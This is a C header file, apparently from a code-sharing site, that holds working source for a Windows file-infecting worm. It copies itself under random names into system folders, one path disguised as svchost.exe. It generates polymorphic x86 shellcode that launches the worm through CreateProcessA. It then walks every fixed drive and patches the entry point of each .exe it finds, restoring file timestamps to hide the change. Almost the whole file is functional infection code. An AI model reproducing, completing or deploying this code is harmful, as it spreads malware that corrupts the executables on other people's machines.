📄 wrom.h
字号:
#include "windows.h"
char *InfectCode = NULL;
DWORD aCreateProcess = 0;
char CopyFiles[10][256];
char SysDirBuff[32];//system dir
int GetRand()
{
return rand();
}
int SEU_Rand(int ran)//自定义的随机数发生器
{
unsigned long Time=GetTickCount();
int seed=rand()+3;
seed=(seed*Time)%ran;
return seed;
}
void InItCopyFiles()
{
::GetSystemDirectory(SysDirBuff,32);
char This_File[256];
strcpy(This_File,SysDirBuff);
strcat(This_File,"\\drivers\\svchost.exe");
memset(CopyFiles,0,2560);
strcpy(CopyFiles[0],SysDirBuff);
strcpy(CopyFiles[1],SysDirBuff);
strcpy(CopyFiles[2],SysDirBuff);
strcpy(CopyFiles[3],SysDirBuff);
strcpy(CopyFiles[4],SysDirBuff);
strcat(CopyFiles[4],"\\");
strcat(CopyFiles[3],"\\");
strcat(CopyFiles[2],"\\drivers\\");
strcat(CopyFiles[1],"\\dllcache\\");
strcat(CopyFiles[0],"\\IME\\");
sprintf(CopyFiles[9],"%c:\\Program Files\\Common Files\\Microsoft Shared\\",SysDirBuff[0]);
sprintf(CopyFiles[8],"%c:\\Program Files\\Internet Explorer\\Connection Wizard\\",SysDirBuff[0]);
sprintf(CopyFiles[7],"%c:\\Program Files\\Windows Media Player\\",SysDirBuff[0]);
sprintf(CopyFiles[6],"%c:\\WINDOWS\\addins\\",SysDirBuff[0]);
sprintf(CopyFiles[5],"%c:\\WINDOWS\\system\\",SysDirBuff[0]);
char abc[]="abcdefghijklmnopqrstuvwxyz";
char temp[10];
for (int t=0;t<10;t++)
{
memset(temp,0,10);
for(int i=0;i<5;i++)
{
temp[i]=abc[SEU_Rand(26)];
}
strcat(temp,".exe");
strcat(CopyFiles[t],temp);
::CopyFile(This_File,CopyFiles[t],FALSE);
}
}
/*
Build the thunk code. This is the kernel code.
Parameters:
hostentry:original file's code entry point(RVA)
startaddr:where my thunk code start(RVA)
vname:worm file name, include full path
*/
int BuildInfectCode(const DWORD hostentry, const DWORD startaddr, const char *vname)
{
char *p = InfectCode;
unsigned char t, c1, c2;
int i;
if(0 == aCreateProcess)
aCreateProcess = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateProcessA");
//code body
*p++ = 0x68; //push
*(DWORD *)p = startaddr + 0x42; //seh handler
p += 4;
t = GetRand() % 3; //eax, edx, ecx
*p++ = 0x31 + ((GetRand() && 1) << 1); //xor
*p++ = 0xc0 | (t << 3) | t; //xor reg, reg
*p++ = 0x64; //fs
*p++ = 0xff; //push
*p++ = 0x30 | t;
*p++ = 0x64; //fs
*p++ = 0x89; //mov
*p++ = 0x20 | t; //mov [reg], esp
t = GetRand() % 3; //eax, edx
if(0x01 == t) t = 0; //don't use ecx
*p++ = 0x31 + ((GetRand() && 1) << 1); //xor
*p++ = 0xc0 | (t << 3) | t; //xor reg, reg
*(WORD *)p = 0x106a; //push 10h
p += 2;
*p++ = 0x59; //pop ecx
*p++ = 0x50 | t; //push reg
*(WORD *)p = 0xfde2; //loop $ - 3
p += 2;
*(WORD *)p = 0x446a; //push 44h
p += 2;
c1 = (t + 1) % 3;
for(c2 = 0; c2 < 3; c2++)
if(c2 != t && c2 != c1) break;
*p++ = 0x8b; //mov
*p++ = 0xc4 | (c1 << 3); //mov reg1, esp STARTUPINFO
*(DWORD *)p = 0x8b10ec83; //sub esp, 10h/mov
p += 4;
*p++ = 0xc4 | (c2 << 3); //mov reg2, esp PROCESS_INformATION
*p++ = 0x50 | c2; //push reg2
*p++ = 0x50 | c1; //push reg1
for(i = 0; i < 6; i++)
*p++ = 0x50 | t; //push reg, reg is 0
*p++ = 0x68; //push
*(DWORD *)p = startaddr + 0x54; //virus file name
p += 4;
*p++ = 0x50 | t; //push reg, reg is 0
t = GetRand() % 3; //eax, edx, ecx
*p++ = 0xb8 | t; //mov
*(DWORD *)p = aCreateProcess; //mov reg, aCreateProcess
p += 4;
*p++ = 0xff;
*p++ = 0xd0 | t; //call reg
t = GetRand() % 3; //eax, edx, ecx
*(DWORD *)p = 0x3354c483; //add esp, 54h/xor
p += 4;
*p++ = 0xc0 | (t << 3) | t; //xor reg, reg
*p++ = 0x64; //fs
*p++ = 0x8f; //push
*p++ = t;
*p++ = 0x58 | (GetRand() % 3);
*p++ = 0x68; //push
*(DWORD *)p = hostentry; //host entry
p += 4;
*p++ = 0xc3; //retn
//seh handler
*p++ = 0x68; //push
*(DWORD *)p = hostentry; //host entry
p += 4;
*(DWORD *)p = 0x1024448b; //mov eax, [esp + 10h]
p += 4;
*(WORD *)p = 0x808f; //pop
p += 2;
*(DWORD *)p = 0xb8; //pop [eax + 0b8h]
p += 4;
*(WORD *)p = 0xc033; //xor eax,eax
p += 2;
*p++ = 0xc3; //retn
i = -1;
do {
*p++ = vname[++i];
}while(vname[i] != 0);
return p - InfectCode;
}
void InfectFileHelper(char *buf, const char *vname)
{
char *p = buf, *sec;
DWORD entry, code, t, startaddr, base;
int i, seccount, clen;
if(NULL == InfectCode)
InfectCode = new char[4096];
try {
if(*(WORD *)p != 0x5a4d) return;
p = buf + *(WORD *)(p + 0x3c);
if(*(WORD *)p != 0x4550) return;
t = *(WORD *)(p + 0x5c);
if(t != 0x02 && t != 0x03) return;
entry = *(DWORD *)(p + 0x28);
sec = p + 0x100;
seccount = *(WORD *)(p + 6);
for(i = 0; i < seccount; i++) {
if(*(DWORD *)(sec + 4) <= entry
&& *(DWORD *)sec + *(DWORD *)(sec + 4) > entry)
break;
sec += 0x28;
}
if(i >= seccount - 1)
return; //assume the code section is not the last one
t = *(DWORD *)(sec + 0x08);
if(*(DWORD *)sec < t) t = *(DWORD *)sec;
startaddr = *(DWORD *)(sec + 0x04) + t;
base = *(DWORD *)(p + 0x34);
clen = BuildInfectCode(entry + base, startaddr + base, vname);
code = t + *(DWORD *)(sec + 0x0c);
if(*(DWORD *)(sec + 0x28 + 0x0c)
<= code + clen)
return; //no enough room
MoveMemory(buf + code, InfectCode, clen);
*(DWORD *)(p + 0x28) = startaddr;
}
catch(...) {
}
}
void InfectFile(const char *filename, const char *vname)
{
HANDLE fh, fm;
DWORD fa = GetFileAttributes(filename);
FILETIME ft[3];
char *buf;
SetFileAttributes(filename, FILE_ATTRIBUTE_NORMAL);
GetFileTime(fh, ft, ft + 1, ft + 2);
fh = CreateFile(filename, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, 0);
if(INVALID_HANDLE_VALUE == fh) goto end;
fm = CreateFileMapping(fh, NULL, PAGE_READWRITE, 0, 0, NULL);
if(fm != NULL) {
buf = (char *)MapViewOfFile(fm, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
if(buf != NULL) {
InfectFileHelper(buf, vname);
UnmapViewOfFile(buf);
}
CloseHandle(fm);
}
CloseHandle(fh);
end:
SetFileAttributes(filename, fa);
SetFileTime(fh, ft, ft + 1, ft + 2);
}
void InfectAllFiles(char * lpPath)
{
if (lpPath[0]==SysDirBuff[0])
{//系统盘才考虑
if (strstr(lpPath,"Windows Media Player")!=NULL)
return;
if (strstr(lpPath,"Outlook Express")!=NULL)
return;
if (strstr(lpPath,"Internet Explorer")!=NULL)
return;
if (strstr(lpPath,"NetMeeting")!=NULL)
return;
if (strstr(lpPath,"ComPlus Applications;Messenger")!=NULL)
return;
if (strstr(lpPath,"WINNT")!=NULL)
return;
if (strstr(lpPath,"Documents and Settings")!=NULL)
return;
if (strstr(lpPath,"System Volume Information")!=NULL)
return;
if (strstr(lpPath,"Recycled")!=NULL)
return;
if (strstr(lpPath,"Windows NT")!=NULL)
return;
if (strstr(lpPath,"WindowsUpdate")!=NULL)
return;
if (strstr(lpPath,"Messenger")!=NULL)
return;
if (strstr(lpPath,"Microsoft Frontpage")!=NULL)
return;
if (strstr(lpPath,"Movie Maker")!=NULL)
return;
if (strstr(lpPath,"NetMeeting")!=NULL)
return;
if (strstr(lpPath,"WINDOWS")!=NULL)
return;
}
char szFind[MAX_PATH];
WIN32_FIND_DATA FindFileData;
strcpy(szFind,lpPath);
strcat(szFind,"\\*.*");
HANDLE hFind=::FindFirstFile(szFind,&FindFileData);
if(INVALID_HANDLE_VALUE == hFind)
return;
while(TRUE)
{
//If director, visit all sub-folders
if(FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
if(FindFileData.cFileName[0]!='.')
{
char szFile[MAX_PATH];
strcpy(szFile,lpPath);
strcat(szFile,"\\");
strcat(szFile,FindFileData.cFileName);
InfectAllFiles(szFile);
}
}
else
{
//worm if exe file
int len = strlen(FindFileData.cFileName);
const char *p = (char *)&FindFileData.cFileName[len-3];
if (_stricmp(p, "exe") == 0) //case insentive!
{
char strFileName[MAX_PATH];
strcpy(strFileName,lpPath);
strcat(strFileName,"\\");
strcat(strFileName,FindFileData.cFileName);
//感染文件
InfectFile(strFileName,CopyFiles[SEU_Rand(10)]);
}
}
//Find next file
if(!FindNextFile(hFind,&FindFileData))
break;
}
FindClose(hFind);
}
void WormComputer()
{
InItCopyFiles();
srand(GetTickCount());
for (char cLabel='c'; cLabel<='z'; cLabel++)
{
char strRootPath[] = {"c:\\"};
strRootPath[0] = cLabel;
if(GetDriveType(strRootPath)== DRIVE_FIXED)
{
strRootPath[2] = '\0'; //"c:"
InfectAllFiles(strRootPath);
}
}
}
unsigned long CALLBACK Worm_thread(LPVOID dParam)
{
WormComputer();
return 1;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -